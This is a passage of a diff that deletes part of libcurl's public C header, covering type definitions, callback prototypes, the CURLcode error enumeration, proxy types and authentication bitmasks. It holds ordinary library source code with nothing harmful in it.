-   (defined(__FreeBSD_version) && (__FreeBSD_version < 800000))
-#include <sys/select.h>
-#endif
-
-#if !defined(WIN32) && !defined(_WIN32_WCE)
-#include <sys/socket.h>
-#endif
-
-#if !defined(WIN32) && !defined(__WATCOMC__) && !defined(__VXWORKS__)
-#include <sys/time.h>
-#endif
-
-#ifdef __BEOS__
-#include <support/SupportDefs.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(BUILDING_LIBCURL) || defined(CURL_STRICTER)
-typedef struct Curl_easy CURL;
-typedef struct Curl_share CURLSH;
-#else
-typedef void CURL;
-typedef void CURLSH;
-#endif
-
-/*
- * libcurl external API function linkage decorations.
- */
-
-#ifdef CURL_STATICLIB
-#  define CURL_EXTERN
-#elif defined(WIN32) || defined(_WIN32) || defined(__SYMBIAN32__)
-#  if defined(BUILDING_LIBCURL)
-#    define CURL_EXTERN  __declspec(dllexport)
-#  else
-#    define CURL_EXTERN  __declspec(dllimport)
-#  endif
-#elif defined(BUILDING_LIBCURL) && defined(CURL_HIDDEN_SYMBOLS)
-#  define CURL_EXTERN CURL_EXTERN_SYMBOL
-#else
-#  define CURL_EXTERN
-#endif
-
-#ifndef curl_socket_typedef
-/* socket typedef */
-#if defined(WIN32) && !defined(__LWIP_OPT_H__) && !defined(LWIP_HDR_OPT_H)
-typedef SOCKET curl_socket_t;
-#define CURL_SOCKET_BAD INVALID_SOCKET
-#else
-typedef int curl_socket_t;
-#define CURL_SOCKET_BAD -1
-#endif
-#define curl_socket_typedef
-#endif /* curl_socket_typedef */
-
-/* enum for the different supported SSL backends */
-typedef enum {
-  CURLSSLBACKEND_NONE = 0,
-  CURLSSLBACKEND_OPENSSL = 1,
-  CURLSSLBACKEND_GNUTLS = 2,
-  CURLSSLBACKEND_NSS = 3,
-  CURLSSLBACKEND_OBSOLETE4 = 4,  /* Was QSOSSL. */
-  CURLSSLBACKEND_GSKIT = 5,
-  CURLSSLBACKEND_POLARSSL = 6,
-  CURLSSLBACKEND_WOLFSSL = 7,
-  CURLSSLBACKEND_SCHANNEL = 8,
-  CURLSSLBACKEND_DARWINSSL = 9,
-  CURLSSLBACKEND_AXTLS = 10,
-  CURLSSLBACKEND_MBEDTLS = 11
-} curl_sslbackend;
-
-/* aliases for library clones and renames */
-#define CURLSSLBACKEND_LIBRESSL CURLSSLBACKEND_OPENSSL
-#define CURLSSLBACKEND_BORINGSSL CURLSSLBACKEND_OPENSSL
-#define CURLSSLBACKEND_CYASSL CURLSSLBACKEND_WOLFSSL
-
-struct curl_httppost {
-  struct curl_httppost *next;       /* next entry in the list */
-  char *name;                       /* pointer to allocated name */
-  long namelength;                  /* length of name length */
-  char *contents;                   /* pointer to allocated data contents */
-  long contentslength;              /* length of contents field, see also
-                                       CURL_HTTPPOST_LARGE */
-  char *buffer;                     /* pointer to allocated buffer contents */
-  long bufferlength;                /* length of buffer field */
-  char *contenttype;                /* Content-Type */
-  struct curl_slist *contentheader; /* list of extra headers for this form */
-  struct curl_httppost *more;       /* if one field name has more than one
-                                       file, this link should link to following
-                                       files */
-  long flags;                       /* as defined below */
-
-/* specified content is a file name */
-#define CURL_HTTPPOST_FILENAME (1<<0)
-/* specified content is a file name */
-#define CURL_HTTPPOST_READFILE (1<<1)
-/* name is only stored pointer do not free in formfree */
-#define CURL_HTTPPOST_PTRNAME (1<<2)
-/* contents is only stored pointer do not free in formfree */
-#define CURL_HTTPPOST_PTRCONTENTS (1<<3)
-/* upload file from buffer */
-#define CURL_HTTPPOST_BUFFER (1<<4)
-/* upload file from pointer contents */
-#define CURL_HTTPPOST_PTRBUFFER (1<<5)
-/* upload file contents by using the regular read callback to get the data and
-   pass the given pointer as custom pointer */
-#define CURL_HTTPPOST_CALLBACK (1<<6)
-/* use size in 'contentlen', added in 7.46.0 */
-#define CURL_HTTPPOST_LARGE (1<<7)
-
-  char *showfilename;               /* The file name to show. If not set, the
-                                       actual file name will be used (if this
-                                       is a file part) */
-  void *userp;                      /* custom pointer used for
-                                       HTTPPOST_CALLBACK posts */
-  curl_off_t contentlen;            /* alternative length of contents
-                                       field. Used if CURL_HTTPPOST_LARGE is
-                                       set. Added in 7.46.0 */
-};
-
-/* This is the CURLOPT_PROGRESSFUNCTION callback proto. It is now considered
-   deprecated but was the only choice up until 7.31.0 */
-typedef int (*curl_progress_callback)(void *clientp,
-                                      double dltotal,
-                                      double dlnow,
-                                      double ultotal,
-                                      double ulnow);
-
-/* This is the CURLOPT_XFERINFOFUNCTION callback proto. It was introduced in
-   7.32.0, it avoids floating point and provides more detailed information. */
-typedef int (*curl_xferinfo_callback)(void *clientp,
-                                      curl_off_t dltotal,
-                                      curl_off_t dlnow,
-                                      curl_off_t ultotal,
-                                      curl_off_t ulnow);
-
-#ifndef CURL_MAX_READ_SIZE
-  /* The maximum receive buffer size configurable via CURLOPT_BUFFERSIZE. */
-#define CURL_MAX_READ_SIZE 524288
-#endif
-
-#ifndef CURL_MAX_WRITE_SIZE
-  /* Tests have proven that 20K is a very bad buffer size for uploads on
-     Windows, while 16K for some odd reason performed a lot better.
-     We do the ifndef check to allow this value to easier be changed at build
-     time for those who feel adventurous. The practical minimum is about
-     400 bytes since libcurl uses a buffer of this size as a scratch area
-     (unrelated to network send operations). */
-#define CURL_MAX_WRITE_SIZE 16384
-#endif
-
-#ifndef CURL_MAX_HTTP_HEADER
-/* The only reason to have a max limit for this is to avoid the risk of a bad
-   server feeding libcurl with a never-ending header that will cause reallocs
-   infinitely */
-#define CURL_MAX_HTTP_HEADER (100*1024)
-#endif
-
-/* This is a magic return code for the write callback that, when returned,
-   will signal libcurl to pause receiving on the current transfer. */
-#define CURL_WRITEFUNC_PAUSE 0x10000001
-
-typedef size_t (*curl_write_callback)(char *buffer,
-                                      size_t size,
-                                      size_t nitems,
-                                      void *outstream);
-
-/* This callback will be called when a new resolver request is made */
-typedef int (*curl_resolver_start_callback)(void *resolver_state,
-                                            void *reserved, void *userdata);
-
-/* enumeration of file types */
-typedef enum {
-  CURLFILETYPE_FILE = 0,
-  CURLFILETYPE_DIRECTORY,
-  CURLFILETYPE_SYMLINK,
-  CURLFILETYPE_DEVICE_BLOCK,
-  CURLFILETYPE_DEVICE_CHAR,
-  CURLFILETYPE_NAMEDPIPE,
-  CURLFILETYPE_SOCKET,
-  CURLFILETYPE_DOOR, /* is possible only on Sun Solaris now */
-
-  CURLFILETYPE_UNKNOWN /* should never occur */
-} curlfiletype;
-
-#define CURLFINFOFLAG_KNOWN_FILENAME    (1<<0)
-#define CURLFINFOFLAG_KNOWN_FILETYPE    (1<<1)
-#define CURLFINFOFLAG_KNOWN_TIME        (1<<2)
-#define CURLFINFOFLAG_KNOWN_PERM        (1<<3)
-#define CURLFINFOFLAG_KNOWN_UID         (1<<4)
-#define CURLFINFOFLAG_KNOWN_GID         (1<<5)
-#define CURLFINFOFLAG_KNOWN_SIZE        (1<<6)
-#define CURLFINFOFLAG_KNOWN_HLINKCOUNT  (1<<7)
-
-/* Content of this structure depends on information which is known and is
-   achievable (e.g. by FTP LIST parsing). Please see the url_easy_setopt(3) man
-   page for callbacks returning this structure -- some fields are mandatory,
-   some others are optional. The FLAG field has special meaning. */
-struct curl_fileinfo {
-  char *filename;
-  curlfiletype filetype;
-  time_t time;
-  unsigned int perm;
-  int uid;
-  int gid;
-  curl_off_t size;
-  long int hardlinks;
-
-  struct {
-    /* If some of these fields is not NULL, it is a pointer to b_data. */
-    char *time;
-    char *perm;
-    char *user;
-    char *group;
-    char *target; /* pointer to the target filename of a symlink */
-  } strings;
-
-  unsigned int flags;
-
-  /* used internally */
-  char *b_data;
-  size_t b_size;
-  size_t b_used;
-};
-
-/* return codes for CURLOPT_CHUNK_BGN_FUNCTION */
-#define CURL_CHUNK_BGN_FUNC_OK      0
-#define CURL_CHUNK_BGN_FUNC_FAIL    1 /* tell the lib to end the task */
-#define CURL_CHUNK_BGN_FUNC_SKIP    2 /* skip this chunk over */
-
-/* if splitting of data transfer is enabled, this callback is called before
-   download of an individual chunk started. Note that parameter "remains" works
-   only for FTP wildcard downloading (for now), otherwise is not used */
-typedef long (*curl_chunk_bgn_callback)(const void *transfer_info,
-                                        void *ptr,
-                                        int remains);
-
-/* return codes for CURLOPT_CHUNK_END_FUNCTION */
-#define CURL_CHUNK_END_FUNC_OK      0
-#define CURL_CHUNK_END_FUNC_FAIL    1 /* tell the lib to end the task */
-
-/* If splitting of data transfer is enabled this callback is called after
-   download of an individual chunk finished.
-   Note! After this callback was set then it have to be called FOR ALL chunks.
-   Even if downloading of this chunk was skipped in CHUNK_BGN_FUNC.
-   This is the reason why we don't need "transfer_info" parameter in this
-   callback and we are not interested in "remains" parameter too. */
-typedef long (*curl_chunk_end_callback)(void *ptr);
-
-/* return codes for FNMATCHFUNCTION */
-#define CURL_FNMATCHFUNC_MATCH    0 /* string corresponds to the pattern */
-#define CURL_FNMATCHFUNC_NOMATCH  1 /* pattern doesn't match the string */
-#define CURL_FNMATCHFUNC_FAIL     2 /* an error occurred */
-
-/* callback type for wildcard downloading pattern matching. If the
-   string matches the pattern, return CURL_FNMATCHFUNC_MATCH value, etc. */
-typedef int (*curl_fnmatch_callback)(void *ptr,
-                                     const char *pattern,
-                                     const char *string);
-
-/* These are the return codes for the seek callbacks */
-#define CURL_SEEKFUNC_OK       0
-#define CURL_SEEKFUNC_FAIL     1 /* fail the entire transfer */
-#define CURL_SEEKFUNC_CANTSEEK 2 /* tell libcurl seeking can't be done, so
-                                    libcurl might try other means instead */
-typedef int (*curl_seek_callback)(void *instream,
-                                  curl_off_t offset,
-                                  int origin); /* 'whence' */
-
-/* This is a return code for the read callback that, when returned, will
-   signal libcurl to immediately abort the current transfer. */
-#define CURL_READFUNC_ABORT 0x10000000
-/* This is a return code for the read callback that, when returned, will
-   signal libcurl to pause sending data on the current transfer. */
-#define CURL_READFUNC_PAUSE 0x10000001
-
-typedef size_t (*curl_read_callback)(char *buffer,
-                                      size_t size,
-                                      size_t nitems,
-                                      void *instream);
-
-typedef enum {
-  CURLSOCKTYPE_IPCXN,  /* socket created for a specific IP connection */
-  CURLSOCKTYPE_ACCEPT, /* socket created by accept() call */
-  CURLSOCKTYPE_LAST    /* never use */
-} curlsocktype;
-
-/* The return code from the sockopt_callback can signal information back
-   to libcurl: */
-#define CURL_SOCKOPT_OK 0
-#define CURL_SOCKOPT_ERROR 1 /* causes libcurl to abort and return
-                                CURLE_ABORTED_BY_CALLBACK */
-#define CURL_SOCKOPT_ALREADY_CONNECTED 2
-
-typedef int (*curl_sockopt_callback)(void *clientp,
-                                     curl_socket_t curlfd,
-                                     curlsocktype purpose);
-
-struct curl_sockaddr {
-  int family;
-  int socktype;
-  int protocol;
-  unsigned int addrlen; /* addrlen was a socklen_t type before 7.18.0 but it
-                           turned really ugly and painful on the systems that
-                           lack this type */
-  struct sockaddr addr;
-};
-
-typedef curl_socket_t
-(*curl_opensocket_callback)(void *clientp,
-                            curlsocktype purpose,
-                            struct curl_sockaddr *address);
-
-typedef int
-(*curl_closesocket_callback)(void *clientp, curl_socket_t item);
-
-typedef enum {
-  CURLIOE_OK,            /* I/O operation successful */
-  CURLIOE_UNKNOWNCMD,    /* command was unknown to callback */
-  CURLIOE_FAILRESTART,   /* failed to restart the read */
-  CURLIOE_LAST           /* never use */
-} curlioerr;
-
-typedef enum {
-  CURLIOCMD_NOP,         /* no operation */
-  CURLIOCMD_RESTARTREAD, /* restart the read stream from start */
-  CURLIOCMD_LAST         /* never use */
-} curliocmd;
-
-typedef curlioerr (*curl_ioctl_callback)(CURL *handle,
-                                         int cmd,
-                                         void *clientp);
-
-#ifndef CURL_DID_MEMORY_FUNC_TYPEDEFS
-/*
- * The following typedef's are signatures of malloc, free, realloc, strdup and
- * calloc respectively.  Function pointers of these types can be passed to the
- * curl_global_init_mem() function to set user defined memory management
- * callback routines.
- */
-typedef void *(*curl_malloc_callback)(size_t size);
-typedef void (*curl_free_callback)(void *ptr);
-typedef void *(*curl_realloc_callback)(void *ptr, size_t size);
-typedef char *(*curl_strdup_callback)(const char *str);
-typedef void *(*curl_calloc_callback)(size_t nmemb, size_t size);
-
-#define CURL_DID_MEMORY_FUNC_TYPEDEFS
-#endif
-
-/* the kind of data that is passed to information_callback*/
-typedef enum {
-  CURLINFO_TEXT = 0,
-  CURLINFO_HEADER_IN,    /* 1 */
-  CURLINFO_HEADER_OUT,   /* 2 */
-  CURLINFO_DATA_IN,      /* 3 */
-  CURLINFO_DATA_OUT,     /* 4 */
-  CURLINFO_SSL_DATA_IN,  /* 5 */
-  CURLINFO_SSL_DATA_OUT, /* 6 */
-  CURLINFO_END
-} curl_infotype;
-
-typedef int (*curl_debug_callback)
-       (CURL *handle,      /* the handle/transfer this concerns */
-        curl_infotype type, /* what kind of data */
-        char *data,        /* points to the data */
-        size_t size,       /* size of the data pointed to */
-        void *userptr);    /* whatever the user please */
-
-/* All possible error codes from all sorts of curl functions. Future versions
-   may return other values, stay prepared.
-
-   Always add new return codes last. Never *EVER* remove any. The return
-   codes must remain the same!
- */
-
-typedef enum {
-  CURLE_OK = 0,
-  CURLE_UNSUPPORTED_PROTOCOL,    /* 1 */
-  CURLE_FAILED_INIT,             /* 2 */
-  CURLE_URL_MALFORMAT,           /* 3 */
-  CURLE_NOT_BUILT_IN,            /* 4 - [was obsoleted in August 2007 for
-                                    7.17.0, reused in April 2011 for 7.21.5] */
-  CURLE_COULDNT_RESOLVE_PROXY,   /* 5 */
-  CURLE_COULDNT_RESOLVE_HOST,    /* 6 */
-  CURLE_COULDNT_CONNECT,         /* 7 */
-  CURLE_WEIRD_SERVER_REPLY,      /* 8 */
-  CURLE_REMOTE_ACCESS_DENIED,    /* 9 a service was denied by the server
-                                    due to lack of access - when login fails
-                                    this is not returned. */
-  CURLE_FTP_ACCEPT_FAILED,       /* 10 - [was obsoleted in April 2006 for
-                                    7.15.4, reused in Dec 2011 for 7.24.0]*/
-  CURLE_FTP_WEIRD_PASS_REPLY,    /* 11 */
-  CURLE_FTP_ACCEPT_TIMEOUT,      /* 12 - timeout occurred accepting server
-                                    [was obsoleted in August 2007 for 7.17.0,
-                                    reused in Dec 2011 for 7.24.0]*/
-  CURLE_FTP_WEIRD_PASV_REPLY,    /* 13 */
-  CURLE_FTP_WEIRD_227_FORMAT,    /* 14 */
-  CURLE_FTP_CANT_GET_HOST,       /* 15 */
-  CURLE_HTTP2,                   /* 16 - A problem in the http2 framing layer.
-                                    [was obsoleted in August 2007 for 7.17.0,
-                                    reused in July 2014 for 7.38.0] */
-  CURLE_FTP_COULDNT_SET_TYPE,    /* 17 */
-  CURLE_PARTIAL_FILE,            /* 18 */
-  CURLE_FTP_COULDNT_RETR_FILE,   /* 19 */
-  CURLE_OBSOLETE20,              /* 20 - NOT USED */
-  CURLE_QUOTE_ERROR,             /* 21 - quote command failure */
-  CURLE_HTTP_RETURNED_ERROR,     /* 22 */
-  CURLE_WRITE_ERROR,             /* 23 */
-  CURLE_OBSOLETE24,              /* 24 - NOT USED */
-  CURLE_UPLOAD_FAILED,           /* 25 - failed upload "command" */
-  CURLE_READ_ERROR,              /* 26 - couldn't open/read from file */
-  CURLE_OUT_OF_MEMORY,           /* 27 */
-  /* Note: CURLE_OUT_OF_MEMORY may sometimes indicate a conversion error
-           instead of a memory allocation error if CURL_DOES_CONVERSIONS
-           is defined
-  */
-  CURLE_OPERATION_TIMEDOUT,      /* 28 - the timeout time was reached */
-  CURLE_OBSOLETE29,              /* 29 - NOT USED */
-  CURLE_FTP_PORT_FAILED,         /* 30 - FTP PORT operation failed */
-  CURLE_FTP_COULDNT_USE_REST,    /* 31 - the REST command failed */
-  CURLE_OBSOLETE32,              /* 32 - NOT USED */
-  CURLE_RANGE_ERROR,             /* 33 - RANGE "command" didn't work */
-  CURLE_HTTP_POST_ERROR,         /* 34 */
-  CURLE_SSL_CONNECT_ERROR,       /* 35 - wrong when connecting with SSL */
-  CURLE_BAD_DOWNLOAD_RESUME,     /* 36 - couldn't resume download */
-  CURLE_FILE_COULDNT_READ_FILE,  /* 37 */
-  CURLE_LDAP_CANNOT_BIND,        /* 38 */
-  CURLE_LDAP_SEARCH_FAILED,      /* 39 */
-  CURLE_OBSOLETE40,              /* 40 - NOT USED */
-  CURLE_FUNCTION_NOT_FOUND,      /* 41 - NOT USED starting with 7.53.0 */
-  CURLE_ABORTED_BY_CALLBACK,     /* 42 */
-  CURLE_BAD_FUNCTION_ARGUMENT,   /* 43 */
-  CURLE_OBSOLETE44,              /* 44 - NOT USED */
-  CURLE_INTERFACE_FAILED,        /* 45 - CURLOPT_INTERFACE failed */
-  CURLE_OBSOLETE46,              /* 46 - NOT USED */
-  CURLE_TOO_MANY_REDIRECTS,      /* 47 - catch endless re-direct loops */
-  CURLE_UNKNOWN_OPTION,          /* 48 - User specified an unknown option */
-  CURLE_TELNET_OPTION_SYNTAX,    /* 49 - Malformed telnet option */
-  CURLE_OBSOLETE50,              /* 50 - NOT USED */
-  CURLE_PEER_FAILED_VERIFICATION, /* 51 - peer's certificate or fingerprint
-                                     wasn't verified fine */
-  CURLE_GOT_NOTHING,             /* 52 - when this is a specific error */
-  CURLE_SSL_ENGINE_NOTFOUND,     /* 53 - SSL crypto engine not found */
-  CURLE_SSL_ENGINE_SETFAILED,    /* 54 - can not set SSL crypto engine as
-                                    default */
-  CURLE_SEND_ERROR,              /* 55 - failed sending network data */
-  CURLE_RECV_ERROR,              /* 56 - failure in receiving network data */
-  CURLE_OBSOLETE57,              /* 57 - NOT IN USE */
-  CURLE_SSL_CERTPROBLEM,         /* 58 - problem with the local certificate */
-  CURLE_SSL_CIPHER,              /* 59 - couldn't use specified cipher */
-  CURLE_SSL_CACERT,              /* 60 - problem with the CA cert (path?) */
-  CURLE_BAD_CONTENT_ENCODING,    /* 61 - Unrecognized/bad encoding */
-  CURLE_LDAP_INVALID_URL,        /* 62 - Invalid LDAP URL */
-  CURLE_FILESIZE_EXCEEDED,       /* 63 - Maximum file size exceeded */
-  CURLE_USE_SSL_FAILED,          /* 64 - Requested FTP SSL level failed */
-  CURLE_SEND_FAIL_REWIND,        /* 65 - Sending the data requires a rewind
-                                    that failed */
-  CURLE_SSL_ENGINE_INITFAILED,   /* 66 - failed to initialise ENGINE */
-  CURLE_LOGIN_DENIED,            /* 67 - user, password or similar was not
-                                    accepted and we failed to login */
-  CURLE_TFTP_NOTFOUND,           /* 68 - file not found on server */
-  CURLE_TFTP_PERM,               /* 69 - permission problem on server */
-  CURLE_REMOTE_DISK_FULL,        /* 70 - out of disk space on server */
-  CURLE_TFTP_ILLEGAL,            /* 71 - Illegal TFTP operation */
-  CURLE_TFTP_UNKNOWNID,          /* 72 - Unknown transfer ID */
-  CURLE_REMOTE_FILE_EXISTS,      /* 73 - File already exists */
-  CURLE_TFTP_NOSUCHUSER,         /* 74 - No such user */
-  CURLE_CONV_FAILED,             /* 75 - conversion failed */
-  CURLE_CONV_REQD,               /* 76 - caller must register conversion
-                                    callbacks using curl_easy_setopt options
-                                    CURLOPT_CONV_FROM_NETWORK_FUNCTION,
-                                    CURLOPT_CONV_TO_NETWORK_FUNCTION, and
-                                    CURLOPT_CONV_FROM_UTF8_FUNCTION */
-  CURLE_SSL_CACERT_BADFILE,      /* 77 - could not load CACERT file, missing
-                                    or wrong format */
-  CURLE_REMOTE_FILE_NOT_FOUND,   /* 78 - remote file not found */
-  CURLE_SSH,                     /* 79 - error from the SSH layer, somewhat
-                                    generic so the error message will be of
-                                    interest when this has happened */
-
-  CURLE_SSL_SHUTDOWN_FAILED,     /* 80 - Failed to shut down the SSL
-                                    connection */
-  CURLE_AGAIN,                   /* 81 - socket is not ready for send/recv,
-                                    wait till it's ready and try again (Added
-                                    in 7.18.2) */
-  CURLE_SSL_CRL_BADFILE,         /* 82 - could not load CRL file, missing or
-                                    wrong format (Added in 7.19.0) */
-  CURLE_SSL_ISSUER_ERROR,        /* 83 - Issuer check failed.  (Added in
-                                    7.19.0) */
-  CURLE_FTP_PRET_FAILED,         /* 84 - a PRET command failed */
-  CURLE_RTSP_CSEQ_ERROR,         /* 85 - mismatch of RTSP CSeq numbers */
-  CURLE_RTSP_SESSION_ERROR,      /* 86 - mismatch of RTSP Session Ids */
-  CURLE_FTP_BAD_FILE_LIST,       /* 87 - unable to parse FTP file list */
-  CURLE_CHUNK_FAILED,            /* 88 - chunk callback reported error */
-  CURLE_NO_CONNECTION_AVAILABLE, /* 89 - No connection available, the
-                                    session will be queued */
-  CURLE_SSL_PINNEDPUBKEYNOTMATCH, /* 90 - specified pinned public key did not
-                                     match */
-  CURLE_SSL_INVALIDCERTSTATUS,   /* 91 - invalid certificate status */
-  CURLE_HTTP2_STREAM,            /* 92 - stream error in HTTP/2 framing layer
-                                    */
-  CURLE_RECURSIVE_API_CALL,      /* 93 - an api function was called from
-                                    inside a callback */
-  CURL_LAST /* never use! */
-} CURLcode;
-
-#ifndef CURL_NO_OLDIES /* define this to test if your app builds with all
-                          the obsolete stuff removed! */
-
-/* Previously obsolete error code re-used in 7.38.0 */
-#define CURLE_OBSOLETE16 CURLE_HTTP2
-
-/* Previously obsolete error codes re-used in 7.24.0 */
-#define CURLE_OBSOLETE10 CURLE_FTP_ACCEPT_FAILED
-#define CURLE_OBSOLETE12 CURLE_FTP_ACCEPT_TIMEOUT
-
-/*  compatibility with older names */
-#define CURLOPT_ENCODING CURLOPT_ACCEPT_ENCODING
-#define CURLE_FTP_WEIRD_SERVER_REPLY CURLE_WEIRD_SERVER_REPLY
-
-/* The following were added in 7.21.5, April 2011 */
-#define CURLE_UNKNOWN_TELNET_OPTION CURLE_UNKNOWN_OPTION
-
-/* The following were added in 7.17.1 */
-/* These are scheduled to disappear by 2009 */
-#define CURLE_SSL_PEER_CERTIFICATE CURLE_PEER_FAILED_VERIFICATION
-
-/* The following were added in 7.17.0 */
-/* These are scheduled to disappear by 2009 */
-#define CURLE_OBSOLETE CURLE_OBSOLETE50 /* no one should be using this! */
-#define CURLE_BAD_PASSWORD_ENTERED CURLE_OBSOLETE46
-#define CURLE_BAD_CALLING_ORDER CURLE_OBSOLETE44
-#define CURLE_FTP_USER_PASSWORD_INCORRECT CURLE_OBSOLETE10
-#define CURLE_FTP_CANT_RECONNECT CURLE_OBSOLETE16
-#define CURLE_FTP_COULDNT_GET_SIZE CURLE_OBSOLETE32
-#define CURLE_FTP_COULDNT_SET_ASCII CURLE_OBSOLETE29
-#define CURLE_FTP_WEIRD_USER_REPLY CURLE_OBSOLETE12
-#define CURLE_FTP_WRITE_ERROR CURLE_OBSOLETE20
-#define CURLE_LIBRARY_NOT_FOUND CURLE_OBSOLETE40
-#define CURLE_MALFORMAT_USER CURLE_OBSOLETE24
-#define CURLE_SHARE_IN_USE CURLE_OBSOLETE57
-#define CURLE_URL_MALFORMAT_USER CURLE_NOT_BUILT_IN
-
-#define CURLE_FTP_ACCESS_DENIED CURLE_REMOTE_ACCESS_DENIED
-#define CURLE_FTP_COULDNT_SET_BINARY CURLE_FTP_COULDNT_SET_TYPE
-#define CURLE_FTP_QUOTE_ERROR CURLE_QUOTE_ERROR
-#define CURLE_TFTP_DISKFULL CURLE_REMOTE_DISK_FULL
-#define CURLE_TFTP_EXISTS CURLE_REMOTE_FILE_EXISTS
-#define CURLE_HTTP_RANGE_ERROR CURLE_RANGE_ERROR
-#define CURLE_FTP_SSL_FAILED CURLE_USE_SSL_FAILED
-
-/* The following were added earlier */
-
-#define CURLE_OPERATION_TIMEOUTED CURLE_OPERATION_TIMEDOUT
-
-#define CURLE_HTTP_NOT_FOUND CURLE_HTTP_RETURNED_ERROR
-#define CURLE_HTTP_PORT_FAILED CURLE_INTERFACE_FAILED
-#define CURLE_FTP_COULDNT_STOR_FILE CURLE_UPLOAD_FAILED
-
-#define CURLE_FTP_PARTIAL_FILE CURLE_PARTIAL_FILE
-#define CURLE_FTP_BAD_DOWNLOAD_RESUME CURLE_BAD_DOWNLOAD_RESUME
-
-/* This was the error code 50 in 7.7.3 and a few earlier versions, this
-   is no longer used by libcurl but is instead #defined here only to not
-   make programs break */
-#define CURLE_ALREADY_COMPLETE 99999
-
-/* Provide defines for really old option names */
-#define CURLOPT_FILE CURLOPT_WRITEDATA /* name changed in 7.9.7 */
-#define CURLOPT_INFILE CURLOPT_READDATA /* name changed in 7.9.7 */
-#define CURLOPT_WRITEHEADER CURLOPT_HEADERDATA
-
-/* Since long deprecated options with no code in the lib that does anything
-   with them. */
-#define CURLOPT_WRITEINFO CURLOPT_OBSOLETE40
-#define CURLOPT_CLOSEPOLICY CURLOPT_OBSOLETE72
-
-#endif /*!CURL_NO_OLDIES*/
-
-/* This prototype applies to all conversion callbacks */
-typedef CURLcode (*curl_conv_callback)(char *buffer, size_t length);
-
-typedef CURLcode (*curl_ssl_ctx_callback)(CURL *curl,    /* easy handle */
-                                          void *ssl_ctx, /* actually an
-                                                            OpenSSL SSL_CTX */
-                                          void *userptr);
-
-typedef enum {
-  CURLPROXY_HTTP = 0,   /* added in 7.10, new in 7.19.4 default is to use
-                           CONNECT HTTP/1.1 */
-  CURLPROXY_HTTP_1_0 = 1,   /* added in 7.19.4, force to use CONNECT
-                               HTTP/1.0  */
-  CURLPROXY_HTTPS = 2, /* added in 7.52.0 */
-  CURLPROXY_SOCKS4 = 4, /* support added in 7.15.2, enum existed already
-                           in 7.10 */
-  CURLPROXY_SOCKS5 = 5, /* added in 7.10 */
-  CURLPROXY_SOCKS4A = 6, /* added in 7.18.0 */
-  CURLPROXY_SOCKS5_HOSTNAME = 7 /* Use the SOCKS5 protocol but pass along the
-                                   host name rather than the IP address. added
-                                   in 7.18.0 */
-} curl_proxytype;  /* this enum was added in 7.10 */
-
-/*
- * Bitmasks for CURLOPT_HTTPAUTH and CURLOPT_PROXYAUTH options:
- *
- * CURLAUTH_NONE         - No HTTP authentication
- * CURLAUTH_BASIC        - HTTP Basic authentication (default)
- * CURLAUTH_DIGEST       - HTTP Digest authentication
- * CURLAUTH_NEGOTIATE    - HTTP Negotiate (SPNEGO) authentication
- * CURLAUTH_GSSNEGOTIATE - Alias for CURLAUTH_NEGOTIATE (deprecated)
- * CURLAUTH_NTLM         - HTTP NTLM authentication
- * CURLAUTH_DIGEST_IE    - HTTP Digest authentication with IE flavour
- * CURLAUTH_NTLM_WB      - HTTP NTLM authentication delegated to winbind helper
- * CURLAUTH_ONLY         - Use together with a single other type to force no
- *                         authentication or just that single type
- * CURLAUTH_ANY          - All fine types set
- * CURLAUTH_ANYSAFE      - All fine types except Basic
- */
-
-#define CURLAUTH_NONE         ((unsigned long)0)
-#define CURLAUTH_BASIC        (((unsigned long)1)<<0)
-#define CURLAUTH_DIGEST       (((unsigned long)1)<<1)
-#define CURLAUTH_NEGOTIATE    (((unsigned long)1)<<2)
-/* Deprecated since the advent of CURLAUTH_NEGOTIATE */
-#define CURLAUTH_GSSNEGOTIATE CURLAUTH_NEGOTIATE
-/* Used for CURLOPT_SOCKS5_AUTH to stay terminologically correct */
-#define CURLAUTH_GSSAPI CURLAUTH_NEGOTIATE
-#define CURLAUTH_NTLM         (((unsigned long)1)<<3)
-#define CURLAUTH_DIGEST_IE    (((unsigned long)1)<<4)
-#define CURLAUTH_NTLM_WB      (((unsigned long)1)<<5)
-#define CURLAUTH_ONLY         (((unsigned long)1)<<31)
-#define CURLAUTH_ANY          (~CURLAUTH_DIGEST_IE)
-#define CURLAUTH_ANYSAFE      (~(CURLAUTH_BASIC|CURLAUTH_DIGEST_IE))
-
-#define CURLSSH_AUTH_ANY       ~0     /* all types supported by the server */
-#define CURLSSH_AUTH_NONE      0      /* none allowed, silly but complete */
-#define CURLSSH_AUTH_PUBLICKEY (1<<0) /* public/private key files */
-#define CURLSSH_AUTH_PASSWORD  (1<<1) /* password */
-#define CURLSSH_AUTH_HOST      (1<<2) /* host key files */
-#define CURLSSH_AUTH_KEYBOARD  (1<<3) /* keyboard interactive */
-#define CURLSSH_AUTH_AGENT     (1<<4) /* agent (ssh-agent, pageant...) */
-#define CURLSSH_AUTH_GSSAPI    (1<<5) /* gssapi (kerberos, ...) */
-#define CURLSSH_AUTH_DEFAULT CURLSSH_AUTH_ANY
-
-#define CURLGSSAPI_DELEGATION_NONE        0      /* no delegation (default) */
-#define CURLGSSAPI_DELEGATION_POLICY_FLAG (1<<0) /* if permitted by policy */
-#define CURLGSSAPI_DELEGATION_FLAG        (1<<1) /* delegate always */
-
-#define CURL_ERROR_SIZE 256
-
-enum curl_khtype {
-  CURLKHTYPE_UNKNOWN,
-  CURLKHTYPE_RSA1,
-  CURLKHTYPE_RSA,
-  CURLKHTYPE_DSS,
-  CURLKHTYPE_ECDSA,
-  CURLKHTYPE_ED25519
-};
-
-struct curl_khkey {
-  const char *key; /* points to a zero-terminated string encoded with base64
-                      if len is zero, otherwise to the "raw" data */
-  size_t len;
-  enum curl_khtype keytype;
-};
-
-/* this is the set of return values expected from the curl_sshkeycallback
-   callback */
-enum curl_khstat {
-  CURLKHSTAT_FINE_ADD_TO_FILE,
-  CURLKHSTAT_FINE,
-  CURLKHSTAT_REJECT, /* reject the connection, return an error */
-  CURLKHSTAT_DEFER,  /* do not accept it, but we can't answer right now so
-                        this causes a CURLE_DEFER error but otherwise the
-                        connection will be left intact etc */
-  CURLKHSTAT_LAST    /* not for use, only a marker for last-in-list */
-};
-
-/* this is the set of status codes pass in to the callback */
-enum curl_khmatch {
-  CURLKHMATCH_OK,       /* match */
-  CURLKHMATCH_MISMATCH, /* host found, key mismatch! */
-  CURLKHMATCH_MISSING,  /* no matching host/key found */
-  CURLKHMATCH_LAST      /* not for use, only a marker for last-in-list */
-};
-
-typedef int
-  (*curl_sshkeycallback) (CURL *easy,     /* easy handle */
